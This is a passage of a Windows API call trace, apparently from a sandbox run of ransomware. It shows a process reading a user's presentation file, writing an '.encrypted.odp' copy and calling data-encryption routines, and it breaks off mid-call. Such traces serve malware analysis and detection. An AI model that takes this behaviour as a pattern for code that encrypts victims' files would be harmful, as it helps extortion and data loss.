[0033.526] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.526] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.526] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.526] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0033.526] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.526] CryptDestroyHash (hHash=0x7c2100) returned 1 [0033.526] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.526] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.526] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.526] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.526] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.526] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\htr5pk.odp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0033.526] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.526] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0033.526] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0033.526] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0033.526] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0033.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0033.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0033.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0033.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0033.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0033.527] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0033.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0033.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0033.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0033.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0033.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0033.527] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0033.527] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0033.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0033.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0033.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0033.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0033.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0033.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0033.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0033.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0033.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0033.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0033.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0033.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0033.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0033.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0033.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0033.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0033.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0033.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0033.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0033.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0033.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0033.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0033.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc0) returned 0x7c7758 [0033.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0033.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0033.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0033.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0033.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c7758 | out: hHeap=0x770000) returned 1 [0033.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0033.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0033.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0033.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0033.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0033.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0033.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0033.528] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66")) returned 0x10 [0033.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0033.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0033.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0033.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0033.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0033.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0033.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0033.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0033.529] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\Htr5Pk.encrypted.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\htr5pk.encrypted.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0033.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0033.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0033.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0033.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0033.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0033.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0033.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0033.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0033.529] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0033.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0033.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0033.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0033.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0033.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0033.529] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0033.529] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0033.529] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0033.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0033.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0033.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0033.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0033.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0033.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0033.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0033.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0033.530] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0033.530] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x2e41, lpOverlapped=0x0) returned 1 [0033.531] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0033.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0033.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0033.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x2e41) returned 0x7c7af0 [0033.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0033.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0033.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0033.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0033.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0033.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0033.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x2e41) returned 0x8affc0 [0033.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c7af0 | out: hHeap=0x770000) returned 1 [0033.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.532] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0033.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0033.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x2e41) returned 0x7c7af0 [0033.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c7af0 | out: hHeap=0x770000) returned 1 [0033.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0033.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0033.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.532] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0033.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0033.532] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0033.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0033.533] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0033.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0033.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da198 [0033.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0033.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0033.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0033.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x2e41) returned 0x7c7af0 [0033.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1b8 [0033.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0033.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0033.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0033.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da348 [0033.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0033.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0033.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0033.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da378 [0033.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0033.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0033.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0033.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889688 [0033.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0033.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0033.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0033.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0033.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0033.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x2e41) returned 0x8b2e10 [0033.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0033.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0033.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0033.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0033.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0033.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0033.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0033.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0033.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0033.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0033.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0033.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0033.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0033.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0033.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0033.534] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0033.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0033.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0033.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0033.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0033.534] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0033.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0033.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0033.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0033.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0033.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0033.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0033.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0033.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0033.534] RtlAllocateHeap 